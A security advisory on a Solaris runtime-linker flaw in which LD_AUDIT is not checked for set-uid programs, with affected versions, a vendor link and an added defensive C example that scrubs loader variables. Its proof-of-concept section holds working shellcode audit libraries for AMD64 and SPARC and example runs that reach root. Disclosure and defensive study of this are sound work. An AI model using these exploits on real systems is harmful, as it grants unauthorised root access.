Summary:
Solaris's runtime linker fails to check the value of an environment variable, allowing a local attacker to gain root privileges.
Credit:
The information has been provided by Przemyslaw Frasunek.
Vulnerable Systems:
SPARC and x86 Platform:
* Solaris 8 with patches 109147-31 through 109147-36
* Solaris 9 with patches 112963-16 through 112963-19
* Solaris 10
Immune Systems:
* Solaris 7 is not affected by this issue.
ld.so in Solaris 9 and 10 doesn't check the length of the LD_AUDIT environment variable when running set-uid or set-gid (s[ug]id) binaries, allowing an attacker to run arbitrary code with elevated privileges.
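The missing check the advisory describes is the one a runtime linker's "secure mode" is expected to perform. The following C is an added illustration, not Sun's ld.so source and not the advisory author's code: when the real and effective user or group ids differ, loader-controlled variables such as LD_AUDIT are dropped from the environment before they can influence what gets mapped into the process. The variable list, the function names and the sample environment are assumptions made for this example.

```c
/* Added illustration (not Sun's ld.so code): a loader-style secure-mode
 * filter that drops environment variables which would let an untrusted
 * user choose code or search paths for a privileged process. */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

/* Variables that direct a loader to load or run user-named code.
 * Illustrative list, assumed for this example. */
static const char *const unsafe_vars[] = {
    "LD_AUDIT", "LD_PRELOAD", "LD_LIBRARY_PATH", NULL
};

/* Returns 1 when the "name=value" entry names one of unsafe_vars
 * (exact name match, followed by '='), else 0. */
int is_unsafe_entry(const char *entry)
{
    for (const char *const *v = unsafe_vars; *v; v++) {
        size_t n = strlen(*v);
        if (strncmp(entry, *v, n) == 0 && entry[n] == '=')
            return 1;
    }
    return 0;
}

/* Secure mode: the process runs set-uid or set-gid, i.e. real and
 * effective ids differ. Returns 1 in that case, else 0. */
int is_secure_mode(uid_t ruid, uid_t euid, gid_t rgid, gid_t egid)
{
    return (ruid != euid || rgid != egid) ? 1 : 0;
}

/* In secure mode, removes unsafe entries from the NULL-terminated envp
 * in place and returns how many were dropped. Outside secure mode the
 * environment is left untouched and 0 is returned. A real loader would
 * run this before any lookup that influences what it maps. */
int scrub_env(char **envp, int secure)
{
    int dropped = 0;
    char **dst = envp;

    if (!secure)
        return 0;
    for (char **src = envp; *src; src++) {
        if (is_unsafe_entry(*src)) {
            dropped++;
            continue;
        }
        *dst++ = *src;
    }
    *dst = NULL;
    return dropped;
}

int main(void)
{
    /* Constructed sample environment echoing the advisory's example run. */
    char *env[] = { "HOME=/home/venglin", "LD_AUDIT=/tmp/dupa.so",
                    "PATH=/usr/bin", NULL };
    /* Constructed ids: an unprivileged user running a set-uid-root program. */
    int secure = is_secure_mode(100, 0, 10, 10);
    int dropped = scrub_env(env, secure);

    printf("secure mode: %d, dropped %d unsafe variable(s)\n", secure, dropped);
    for (char **e = env; *e; e++)
        printf("  kept: %s\n", *e);
    return 0;
}
```

The point of the filter is that the decision depends only on the id comparison, not on the variable's value or length: in secure mode the loader never gets as far as opening a user-supplied audit library. Compiling and running the block prints the surviving entries (HOME and PATH) for the constructed environment.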
Proof of Concept Code:
Solaris 10 (AMD64):
//dupa.c
static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb"
"\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01"
"\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f"
"\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07"
"\x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52"
"\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff";
int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
}
Example Run:
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su
# id
uid=0(root) gid=10(staff)
Solaris 9 on SPARC:
//dupa.c
char sh[] =
/* setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
}
Example Run:
$ gcc -fPIC -shared -o /tmp/dupa.so dupa.c
$ export LD_AUDIT=/tmp/dupa.so
$ ping
# id
uid=0(root) gid=100(student)
Vendor Status:
Sun has released an advisory that addresses the issue. For more details see: http://sunsolve.sun.com/search/document.do?assetkey=1-26-101794-1